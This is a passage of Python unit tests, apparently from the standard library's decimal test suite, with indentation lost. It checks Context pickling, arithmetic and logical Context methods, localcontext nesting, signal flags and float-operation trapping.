emax = random.randrange(1, 100)
caps = random.randrange(2)
clamp = random.randrange(2)
# One module dumps
sys.modules['decimal'] = dumper
c = dumper.Context(
prec=prec, Emin=emin, Emax=emax,
rounding=RoundingModes[ri],
capitals=caps, clamp=clamp,
flags=OrderedSignals[dumper][:fi],
traps=OrderedSignals[dumper][:ti]
)
s = pickle.dumps(c, proto)
# The other module loads
sys.modules['decimal'] = loader
d = pickle.loads(s)
self.assertIsInstance(d, loader.Context)
self.assertEqual(d.prec, prec)
self.assertEqual(d.Emin, emin)
self.assertEqual(d.Emax, emax)
self.assertEqual(d.rounding, RoundingModes[ri])
self.assertEqual(d.capitals, caps)
self.assertEqual(d.clamp, clamp)
assert_signals(self, d, 'flags', OrderedSignals[loader][:fi])
assert_signals(self, d, 'traps', OrderedSignals[loader][:ti])
sys.modules['decimal'] = savedecimal
def test_equality_with_other_types(self):
Decimal = self.decimal.Decimal
self.assertIn(Decimal(10), ['a', 1.0, Decimal(10), (1,2), {}])
self.assertNotIn(Decimal(10), ['a', 1.0, (1,2), {}])
def test_copy(self):
# All copies should be deep
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy()
self.assertNotEqual(id(c), id(d))
self.assertNotEqual(id(c.flags), id(d.flags))
self.assertNotEqual(id(c.traps), id(d.traps))
k1 = set(c.flags.keys())
k2 = set(d.flags.keys())
self.assertEqual(k1, k2)
self.assertEqual(c.flags, d.flags)
def test__clamp(self):
# In Python 3.2, the private attribute `_clamp` was made
# public (issue 8540), with the old `_clamp` becoming a
# property wrapping `clamp`. For the duration of Python 3.2
# only, the attribute should be gettable/settable via both
# `clamp` and `_clamp`; in Python 3.3, `_clamp` should be
# removed.
Context = self.decimal.Context
c = Context()
self.assertRaises(AttributeError, getattr, c, '_clamp')
def test_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.abs(Decimal(-1))
self.assertEqual(c.abs(-1), d)
self.assertRaises(TypeError, c.abs, '-1')
def test_add(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.add(Decimal(1), Decimal(1))
self.assertEqual(c.add(1, 1), d)
self.assertEqual(c.add(Decimal(1), 1), d)
self.assertEqual(c.add(1, Decimal(1)), d)
self.assertRaises(TypeError, c.add, '1', 1)
self.assertRaises(TypeError, c.add, 1, '1')
def test_compare(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare(Decimal(1), Decimal(1))
self.assertEqual(c.compare(1, 1), d)
self.assertEqual(c.compare(Decimal(1), 1), d)
self.assertEqual(c.compare(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare, '1', 1)
self.assertRaises(TypeError, c.compare, 1, '1')
def test_compare_signal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_signal(Decimal(1), Decimal(1))
self.assertEqual(c.compare_signal(1, 1), d)
self.assertEqual(c.compare_signal(Decimal(1), 1), d)
self.assertEqual(c.compare_signal(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_signal, '1', 1)
self.assertRaises(TypeError, c.compare_signal, 1, '1')
def test_compare_total(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total(1, 1), d)
self.assertEqual(c.compare_total(Decimal(1), 1), d)
self.assertEqual(c.compare_total(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total, '1', 1)
self.assertRaises(TypeError, c.compare_total, 1, '1')
def test_compare_total_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.compare_total_mag(Decimal(1), Decimal(1))
self.assertEqual(c.compare_total_mag(1, 1), d)
self.assertEqual(c.compare_total_mag(Decimal(1), 1), d)
self.assertEqual(c.compare_total_mag(1, Decimal(1)), d)
self.assertRaises(TypeError, c.compare_total_mag, '1', 1)
self.assertRaises(TypeError, c.compare_total_mag, 1, '1')
def test_copy_abs(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_abs(Decimal(-1))
self.assertEqual(c.copy_abs(-1), d)
self.assertRaises(TypeError, c.copy_abs, '-1')
def test_copy_decimal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_decimal(Decimal(-1))
self.assertEqual(c.copy_decimal(-1), d)
self.assertRaises(TypeError, c.copy_decimal, '-1')
def test_copy_negate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_negate(Decimal(-1))
self.assertEqual(c.copy_negate(-1), d)
self.assertRaises(TypeError, c.copy_negate, '-1')
def test_copy_sign(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.copy_sign(Decimal(1), Decimal(-2))
self.assertEqual(c.copy_sign(1, -2), d)
self.assertEqual(c.copy_sign(Decimal(1), -2), d)
self.assertEqual(c.copy_sign(1, Decimal(-2)), d)
self.assertRaises(TypeError, c.copy_sign, '1', -2)
self.assertRaises(TypeError, c.copy_sign, 1, '-2')
def test_divide(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide(Decimal(1), Decimal(2))
self.assertEqual(c.divide(1, 2), d)
self.assertEqual(c.divide(Decimal(1), 2), d)
self.assertEqual(c.divide(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide, '1', 2)
self.assertRaises(TypeError, c.divide, 1, '2')
def test_divide_int(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divide_int(Decimal(1), Decimal(2))
self.assertEqual(c.divide_int(1, 2), d)
self.assertEqual(c.divide_int(Decimal(1), 2), d)
self.assertEqual(c.divide_int(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divide_int, '1', 2)
self.assertRaises(TypeError, c.divide_int, 1, '2')
def test_divmod(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.divmod(Decimal(1), Decimal(2))
self.assertEqual(c.divmod(1, 2), d)
self.assertEqual(c.divmod(Decimal(1), 2), d)
self.assertEqual(c.divmod(1, Decimal(2)), d)
self.assertRaises(TypeError, c.divmod, '1', 2)
self.assertRaises(TypeError, c.divmod, 1, '2')
def test_exp(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.exp(Decimal(10))
self.assertEqual(c.exp(10), d)
self.assertRaises(TypeError, c.exp, '10')
def test_fma(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.fma(Decimal(2), Decimal(3), Decimal(4))
self.assertEqual(c.fma(2, 3, 4), d)
self.assertEqual(c.fma(Decimal(2), 3, 4), d)
self.assertEqual(c.fma(2, Decimal(3), 4), d)
self.assertEqual(c.fma(2, 3, Decimal(4)), d)
self.assertEqual(c.fma(Decimal(2), Decimal(3), 4), d)
self.assertRaises(TypeError, c.fma, '2', 3, 4)
self.assertRaises(TypeError, c.fma, 2, '3', 4)
self.assertRaises(TypeError, c.fma, 2, 3, '4')
# Issue 12079 for Context.fma ...
self.assertRaises(TypeError, c.fma,
Decimal('Infinity'), Decimal(0), "not a decimal")
self.assertRaises(TypeError, c.fma,
Decimal(1), Decimal('snan'), 1.222)
# ... and for Decimal.fma.
self.assertRaises(TypeError, Decimal('Infinity').fma,
Decimal(0), "not a decimal")
self.assertRaises(TypeError, Decimal(1).fma,
Decimal('snan'), 1.222)
def test_is_finite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_finite(Decimal(10))
self.assertEqual(c.is_finite(10), d)
self.assertRaises(TypeError, c.is_finite, '10')
def test_is_infinite(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_infinite(Decimal(10))
self.assertEqual(c.is_infinite(10), d)
self.assertRaises(TypeError, c.is_infinite, '10')
def test_is_nan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_nan(Decimal(10))
self.assertEqual(c.is_nan(10), d)
self.assertRaises(TypeError, c.is_nan, '10')
def test_is_normal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_normal(Decimal(10))
self.assertEqual(c.is_normal(10), d)
self.assertRaises(TypeError, c.is_normal, '10')
def test_is_qnan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_qnan(Decimal(10))
self.assertEqual(c.is_qnan(10), d)
self.assertRaises(TypeError, c.is_qnan, '10')
def test_is_signed(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_signed(Decimal(10))
self.assertEqual(c.is_signed(10), d)
self.assertRaises(TypeError, c.is_signed, '10')
def test_is_snan(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_snan(Decimal(10))
self.assertEqual(c.is_snan(10), d)
self.assertRaises(TypeError, c.is_snan, '10')
def test_is_subnormal(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_subnormal(Decimal(10))
self.assertEqual(c.is_subnormal(10), d)
self.assertRaises(TypeError, c.is_subnormal, '10')
def test_is_zero(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.is_zero(Decimal(10))
self.assertEqual(c.is_zero(10), d)
self.assertRaises(TypeError, c.is_zero, '10')
def test_ln(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.ln(Decimal(10))
self.assertEqual(c.ln(10), d)
self.assertRaises(TypeError, c.ln, '10')
def test_log10(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.log10(Decimal(10))
self.assertEqual(c.log10(10), d)
self.assertRaises(TypeError, c.log10, '10')
def test_logb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logb(Decimal(10))
self.assertEqual(c.logb(10), d)
self.assertRaises(TypeError, c.logb, '10')
def test_logical_and(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_and(Decimal(1), Decimal(1))
self.assertEqual(c.logical_and(1, 1), d)
self.assertEqual(c.logical_and(Decimal(1), 1), d)
self.assertEqual(c.logical_and(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_and, '1', 1)
self.assertRaises(TypeError, c.logical_and, 1, '1')
def test_logical_invert(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_invert(Decimal(1000))
self.assertEqual(c.logical_invert(1000), d)
self.assertRaises(TypeError, c.logical_invert, '1000')
def test_logical_or(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_or(Decimal(1), Decimal(1))
self.assertEqual(c.logical_or(1, 1), d)
self.assertEqual(c.logical_or(Decimal(1), 1), d)
self.assertEqual(c.logical_or(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_or, '1', 1)
self.assertRaises(TypeError, c.logical_or, 1, '1')
def test_logical_xor(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.logical_xor(Decimal(1), Decimal(1))
self.assertEqual(c.logical_xor(1, 1), d)
self.assertEqual(c.logical_xor(Decimal(1), 1), d)
self.assertEqual(c.logical_xor(1, Decimal(1)), d)
self.assertRaises(TypeError, c.logical_xor, '1', 1)
self.assertRaises(TypeError, c.logical_xor, 1, '1')
def test_max(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max(Decimal(1), Decimal(2))
self.assertEqual(c.max(1, 2), d)
self.assertEqual(c.max(Decimal(1), 2), d)
self.assertEqual(c.max(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max, '1', 2)
self.assertRaises(TypeError, c.max, 1, '2')
def test_max_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.max_mag(Decimal(1), Decimal(2))
self.assertEqual(c.max_mag(1, 2), d)
self.assertEqual(c.max_mag(Decimal(1), 2), d)
self.assertEqual(c.max_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.max_mag, '1', 2)
self.assertRaises(TypeError, c.max_mag, 1, '2')
def test_min(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min(Decimal(1), Decimal(2))
self.assertEqual(c.min(1, 2), d)
self.assertEqual(c.min(Decimal(1), 2), d)
self.assertEqual(c.min(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min, '1', 2)
self.assertRaises(TypeError, c.min, 1, '2')
def test_min_mag(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.min_mag(Decimal(1), Decimal(2))
self.assertEqual(c.min_mag(1, 2), d)
self.assertEqual(c.min_mag(Decimal(1), 2), d)
self.assertEqual(c.min_mag(1, Decimal(2)), d)
self.assertRaises(TypeError, c.min_mag, '1', 2)
self.assertRaises(TypeError, c.min_mag, 1, '2')
def test_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.minus(Decimal(10))
self.assertEqual(c.minus(10), d)
self.assertRaises(TypeError, c.minus, '10')
def test_multiply(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.multiply(Decimal(1), Decimal(2))
self.assertEqual(c.multiply(1, 2), d)
self.assertEqual(c.multiply(Decimal(1), 2), d)
self.assertEqual(c.multiply(1, Decimal(2)), d)
self.assertRaises(TypeError, c.multiply, '1', 2)
self.assertRaises(TypeError, c.multiply, 1, '2')
def test_next_minus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_minus(Decimal(10))
self.assertEqual(c.next_minus(10), d)
self.assertRaises(TypeError, c.next_minus, '10')
def test_next_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_plus(Decimal(10))
self.assertEqual(c.next_plus(10), d)
self.assertRaises(TypeError, c.next_plus, '10')
def test_next_toward(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.next_toward(Decimal(1), Decimal(2))
self.assertEqual(c.next_toward(1, 2), d)
self.assertEqual(c.next_toward(Decimal(1), 2), d)
self.assertEqual(c.next_toward(1, Decimal(2)), d)
self.assertRaises(TypeError, c.next_toward, '1', 2)
self.assertRaises(TypeError, c.next_toward, 1, '2')
def test_normalize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.normalize(Decimal(10))
self.assertEqual(c.normalize(10), d)
self.assertRaises(TypeError, c.normalize, '10')
def test_number_class(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
self.assertEqual(c.number_class(123), c.number_class(Decimal(123)))
self.assertEqual(c.number_class(0), c.number_class(Decimal(0)))
self.assertEqual(c.number_class(-45), c.number_class(Decimal(-45)))
def test_plus(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.plus(Decimal(10))
self.assertEqual(c.plus(10), d)
self.assertRaises(TypeError, c.plus, '10')
def test_power(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.power(Decimal(1), Decimal(4))
self.assertEqual(c.power(1, 4), d)
self.assertEqual(c.power(Decimal(1), 4), d)
self.assertEqual(c.power(1, Decimal(4)), d)
self.assertEqual(c.power(Decimal(1), Decimal(4)), d)
self.assertRaises(TypeError, c.power, '1', 4)
self.assertRaises(TypeError, c.power, 1, '4')
self.assertEqual(c.power(modulo=5, b=8, a=2), 1)
def test_quantize(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.quantize(Decimal(1), Decimal(2))
self.assertEqual(c.quantize(1, 2), d)
self.assertEqual(c.quantize(Decimal(1), 2), d)
self.assertEqual(c.quantize(1, Decimal(2)), d)
self.assertRaises(TypeError, c.quantize, '1', 2)
self.assertRaises(TypeError, c.quantize, 1, '2')
def test_remainder(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder(Decimal(1), Decimal(2))
self.assertEqual(c.remainder(1, 2), d)
self.assertEqual(c.remainder(Decimal(1), 2), d)
self.assertEqual(c.remainder(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder, '1', 2)
self.assertRaises(TypeError, c.remainder, 1, '2')
def test_remainder_near(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.remainder_near(Decimal(1), Decimal(2))
self.assertEqual(c.remainder_near(1, 2), d)
self.assertEqual(c.remainder_near(Decimal(1), 2), d)
self.assertEqual(c.remainder_near(1, Decimal(2)), d)
self.assertRaises(TypeError, c.remainder_near, '1', 2)
self.assertRaises(TypeError, c.remainder_near, 1, '2')
def test_rotate(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.rotate(Decimal(1), Decimal(2))
self.assertEqual(c.rotate(1, 2), d)
self.assertEqual(c.rotate(Decimal(1), 2), d)
self.assertEqual(c.rotate(1, Decimal(2)), d)
self.assertRaises(TypeError, c.rotate, '1', 2)
self.assertRaises(TypeError, c.rotate, 1, '2')
def test_sqrt(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.sqrt(Decimal(10))
self.assertEqual(c.sqrt(10), d)
self.assertRaises(TypeError, c.sqrt, '10')
def test_same_quantum(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.same_quantum(Decimal(1), Decimal(2))
self.assertEqual(c.same_quantum(1, 2), d)
self.assertEqual(c.same_quantum(Decimal(1), 2), d)
self.assertEqual(c.same_quantum(1, Decimal(2)), d)
self.assertRaises(TypeError, c.same_quantum, '1', 2)
self.assertRaises(TypeError, c.same_quantum, 1, '2')
def test_scaleb(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.scaleb(Decimal(1), Decimal(2))
self.assertEqual(c.scaleb(1, 2), d)
self.assertEqual(c.scaleb(Decimal(1), 2), d)
self.assertEqual(c.scaleb(1, Decimal(2)), d)
self.assertRaises(TypeError, c.scaleb, '1', 2)
self.assertRaises(TypeError, c.scaleb, 1, '2')
def test_shift(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.shift(Decimal(1), Decimal(2))
self.assertEqual(c.shift(1, 2), d)
self.assertEqual(c.shift(Decimal(1), 2), d)
self.assertEqual(c.shift(1, Decimal(2)), d)
self.assertRaises(TypeError, c.shift, '1', 2)
self.assertRaises(TypeError, c.shift, 1, '2')
def test_subtract(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.subtract(Decimal(1), Decimal(2))
self.assertEqual(c.subtract(1, 2), d)
self.assertEqual(c.subtract(Decimal(1), 2), d)
self.assertEqual(c.subtract(1, Decimal(2)), d)
self.assertRaises(TypeError, c.subtract, '1', 2)
self.assertRaises(TypeError, c.subtract, 1, '2')
def test_to_eng_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_eng_string(Decimal(10))
self.assertEqual(c.to_eng_string(10), d)
self.assertRaises(TypeError, c.to_eng_string, '10')
def test_to_sci_string(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_sci_string(Decimal(10))
self.assertEqual(c.to_sci_string(10), d)
self.assertRaises(TypeError, c.to_sci_string, '10')
def test_to_integral_exact(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_exact(Decimal(10))
self.assertEqual(c.to_integral_exact(10), d)
self.assertRaises(TypeError, c.to_integral_exact, '10')
def test_to_integral_value(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
c = Context()
d = c.to_integral_value(Decimal(10))
self.assertEqual(c.to_integral_value(10), d)
self.assertRaises(TypeError, c.to_integral_value, '10')
self.assertRaises(TypeError, c.to_integral_value, 10, 'x')
class CContextAPItests(ContextAPItests):
decimal = C
class PyContextAPItests(ContextAPItests):
decimal = P
class ContextWithStatement(unittest.TestCase):
# Can't do these as docstrings until Python 2.6
# as doctest can't handle __future__ statements
def test_localcontext(self):
# Use a copy of the current context in the block
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
with localcontext() as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertIsNot(orig_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_localcontextarg(self):
# Use a copy of the supplied context in the block
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
localcontext = self.decimal.localcontext
orig_ctx = getcontext()
new_ctx = Context(prec=42)
with localcontext(new_ctx) as enter_ctx:
set_ctx = getcontext()
final_ctx = getcontext()
self.assertIs(orig_ctx, final_ctx, 'did not restore context correctly')
self.assertEqual(set_ctx.prec, new_ctx.prec, 'did not set correct context')
self.assertIsNot(new_ctx, set_ctx, 'did not copy the context')
self.assertIs(set_ctx, enter_ctx, '__enter__ returned wrong context')
def test_nested_with_statements(self):
# Use a copy of the supplied context in the block
Decimal = self.decimal.Decimal
Context = self.decimal.Context
getcontext = self.decimal.getcontext
localcontext = self.decimal.localcontext
Clamped = self.decimal.Clamped
Overflow = self.decimal.Overflow
orig_ctx = getcontext()
orig_ctx.clear_flags()
new_ctx = Context(Emax=384)
with localcontext() as c1:
self.assertEqual(c1.flags, orig_ctx.flags)
self.assertEqual(c1.traps, orig_ctx.traps)
c1.traps[Clamped] = True
c1.Emin = -383
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertRaises(Clamped, c1.create_decimal, '0e-999')
self.assertTrue(c1.flags[Clamped])
with localcontext(new_ctx) as c2:
self.assertEqual(c2.flags, new_ctx.flags)
self.assertEqual(c2.traps, new_ctx.traps)
self.assertRaises(Overflow, c2.power, Decimal('3.4e200'), 2)
self.assertFalse(c2.flags[Clamped])
self.assertTrue(c2.flags[Overflow])
del c2
self.assertFalse(c1.flags[Overflow])
del c1
self.assertNotEqual(orig_ctx.Emin, -383)
self.assertFalse(orig_ctx.flags[Clamped])
self.assertFalse(orig_ctx.flags[Overflow])
self.assertFalse(new_ctx.flags[Clamped])
self.assertFalse(new_ctx.flags[Overflow])
def test_with_statements_gc1(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
del c1
with localcontext() as c2:
del c2
with localcontext() as c3:
del c3
with localcontext() as c4:
del c4
def test_with_statements_gc2(self):
localcontext = self.decimal.localcontext
with localcontext() as c1:
with localcontext(c1) as c2:
del c1
with localcontext(c2) as c3:
del c2
with localcontext(c3) as c4:
del c3
del c4
def test_with_statements_gc3(self):
Context = self.decimal.Context
localcontext = self.decimal.localcontext
getcontext = self.decimal.getcontext
setcontext = self.decimal.setcontext
with localcontext() as c1:
del c1
n1 = Context(prec=1)
setcontext(n1)
with localcontext(n1) as c2:
del n1
self.assertEqual(c2.prec, 1)
del c2
n2 = Context(prec=2)
setcontext(n2)
del n2
self.assertEqual(getcontext().prec, 2)
n3 = Context(prec=3)
setcontext(n3)
self.assertEqual(getcontext().prec, 3)
with localcontext(n3) as c3:
del n3
self.assertEqual(c3.prec, 3)
del c3
n4 = Context(prec=4)
setcontext(n4)
del n4
self.assertEqual(getcontext().prec, 4)
with localcontext() as c4:
self.assertEqual(c4.prec, 4)
del c4
class CContextWithStatement(ContextWithStatement):
decimal = C
class PyContextWithStatement(ContextWithStatement):
decimal = P
class ContextFlags(unittest.TestCase):
def test_flags_irrelevant(self):
# check that the result (numeric result + flags raised) of an
# arithmetic operation doesn't depend on the current flags
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Underflow = self.decimal.Underflow
Clamped = self.decimal.Clamped
Subnormal = self.decimal.Subnormal
def raise_error(context, flag):
if self.decimal == C:
context.flags[flag] = True
if context.traps[flag]:
raise flag
else:
context._raise_error(flag)
context = Context(prec=9, Emin = -425000000, Emax = 425000000,
rounding=ROUND_HALF_EVEN, traps=[], flags=[])
# operations that raise various flags, in the form (function, arglist)
operations = [
(context._apply, [Decimal("100E-425000010")]),
(context.sqrt, [Decimal(2)]),
(context.add, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.multiply, [Decimal("1.23456789"), Decimal("9.87654321")]),
(context.subtract, [Decimal("1.23456789"), Decimal("9.87654321")]),
]
# try various flags individually, then a whole lot at once
flagsets = [[Inexact], [Rounded], [Underflow], [Clamped], [Subnormal],
[Inexact, Rounded, Underflow, Clamped, Subnormal]]
for fn, args in operations:
# find answer and flags raised using a clean context
context.clear_flags()
ans = fn(*args)
flags = [k for k, v in context.flags.items() if v]
for extra_flags in flagsets:
# set flags, before calling operation
context.clear_flags()
for flag in extra_flags:
raise_error(context, flag)
new_ans = fn(*args)
# flags that we expect to be set after the operation
expected_flags = list(flags)
for flag in extra_flags:
if flag not in expected_flags:
expected_flags.append(flag)
expected_flags.sort(key=id)
# flags we actually got
new_flags = [k for k,v in context.flags.items() if v]
new_flags.sort(key=id)
self.assertEqual(ans, new_ans,
"operation produces different answers depending on flags set: " +
"expected %s, got %s." % (ans, new_ans))
self.assertEqual(new_flags, expected_flags,
"operation raises different flags depending on flags set: " +
"expected %s, got %s" % (expected_flags, new_flags))
def test_flag_comparisons(self):
Context = self.decimal.Context
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
c = Context()
# Valid SignalDict
self.assertNotEqual(c.flags, c.traps)
self.assertNotEqual(c.traps, c.flags)
c.flags = c.traps
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
c.flags[Rounded] = True
c.traps = c.flags
self.assertEqual(c.flags, c.traps)
self.assertEqual(c.traps, c.flags)
d = {}
d.update(c.flags)
self.assertEqual(d, c.flags)
self.assertEqual(c.flags, d)
d[Inexact] = True
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
# Invalid SignalDict
d = {Inexact:False}
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
d = ["xyz"]
self.assertNotEqual(d, c.flags)
self.assertNotEqual(c.flags, d)
@requires_IEEE_754
def test_float_operation(self):
Decimal = self.decimal.Decimal
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
with localcontext() as c:
##### trap is off by default
self.assertFalse(c.traps[FloatOperation])
# implicit conversion sets the flag
c.clear_flags()
self.assertEqual(Decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertEqual(c.create_decimal(7.5), 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion does not set the flag
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
# comparison sets the flag
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
self.assertEqual(x, 7.5)
self.assertTrue(c.flags[FloatOperation])
##### set the trap
c.traps[FloatOperation] = True
# implicit conversion raises
c.clear_flags()
self.assertRaises(FloatOperation, Decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
self.assertRaises(FloatOperation, c.create_decimal, 7.5)
self.assertTrue(c.flags[FloatOperation])
# explicit conversion is silent
c.clear_flags()
x = Decimal.from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
c.clear_flags()
x = c.create_decimal_from_float(7.5)
self.assertFalse(c.flags[FloatOperation])
def test_float_comparison(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
FloatOperation = self.decimal.FloatOperation
localcontext = self.decimal.localcontext
def assert_attr(a, b, attr, context, signal=None):
context.clear_flags()
f = getattr(a, attr)
if signal == FloatOperation:
self.assertRaises(signal, f, b)
else:
self.assertIs(f(b), True)
self.assertTrue(context.flags[FloatOperation])
small_d = Decimal('0.25')
big_d = Decimal('3.0')
small_f = 0.25
big_f = 3.0
zero_d = Decimal('0.0')
neg_zero_d = Decimal('-0.0')
zero_f = 0.0
neg_zero_f = -0.0
inf_d = Decimal('Infinity')
neg_inf_d = Decimal('-Infinity')
inf_f = float('inf')
neg_inf_f = float('-inf')
def doit(c, signal=None):
# Order
for attr in '__lt__', '__le__':
assert_attr(small_d, big_f, attr, c, signal)
for attr in '__gt__', '__ge__':
assert_attr(big_d, small_f, attr, c, signal)
# Equality
assert_attr(small_d, small_f, '__eq__', c, None)
assert_attr(neg_zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(neg_zero_d, zero_f, '__eq__', c, None)
assert_attr(zero_d, neg_zero_f, '__eq__', c, None)
assert_attr(zero_d, zero_f, '__eq__', c, None)
assert_attr(neg_inf_d, neg_inf_f, '__eq__', c, None)
assert_attr(inf_d, inf_f, '__eq__', c, None)
# Inequality
assert_attr(small_d, big_f, '__ne__', c, None)
assert_attr(Decimal('0.1'), 0.1, '__ne__', c, None)
assert_attr(neg_inf_d, inf_f, '__ne__', c, None)
assert_attr(inf_d, neg_inf_f, '__ne__', c, None)
assert_attr(Decimal('NaN'), float('nan'), '__ne__', c, None)
def test_containers(c, signal=None):
c.clear_flags()
s = set([100.0, Decimal('100.0')])
self.assertEqual(len(s), 1)
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
if signal:
self.assertRaises(signal, sorted, [1.0, Decimal('10.0')])
else:
s = sorted([10.0, Decimal('10.0')])
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in [Decimal('10.0'), 1.0]
self.assertTrue(c.flags[FloatOperation])
c.clear_flags()
b = 10.0 in {Decimal('10.0'):'a', 1.0:'b'}
self.assertTrue(c.flags[FloatOperation])
nc = Context()
with localcontext(nc) as c:
self.assertFalse(c.traps[FloatOperation])
doit(c, signal=None)
test_containers(c, signal=None)
c.traps[FloatOperation] = True
